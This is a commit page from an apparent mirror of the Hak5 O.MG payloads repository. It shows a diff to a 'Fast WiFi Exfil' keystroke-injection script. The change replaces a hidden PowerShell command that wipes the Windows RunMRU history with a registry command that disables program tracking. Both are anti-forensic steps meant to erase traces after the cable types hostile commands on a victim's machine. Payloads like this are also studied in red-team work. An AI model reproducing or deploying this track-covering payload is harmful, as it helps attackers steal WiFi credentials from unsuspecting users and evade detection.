mirror of https://github.com/hak5/omg-payloads.git
Update Fast WiFi Exfil (Powershell - No RunMRU History)
- Removed PowerShell command that clears RunMRU history. + Added efficient method that disables the RunMRU history, which also conveniently removes all previous ran commands/logs.pull/178/head
parent
902b28252e
commit
8fd55617b8
|
@ -11,7 +11,7 @@ ENTER
|
|||
DELAY 100
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -w h -ep bypass Remove-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’ -Name ‘*’ -ErrorAction SilentlyContinue
|
||||
STRING reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
|
||||
ENTER
|
||||
DELAY 100
|
||||
EXIT
|
||||
|
|
Loading…
Reference in New Issue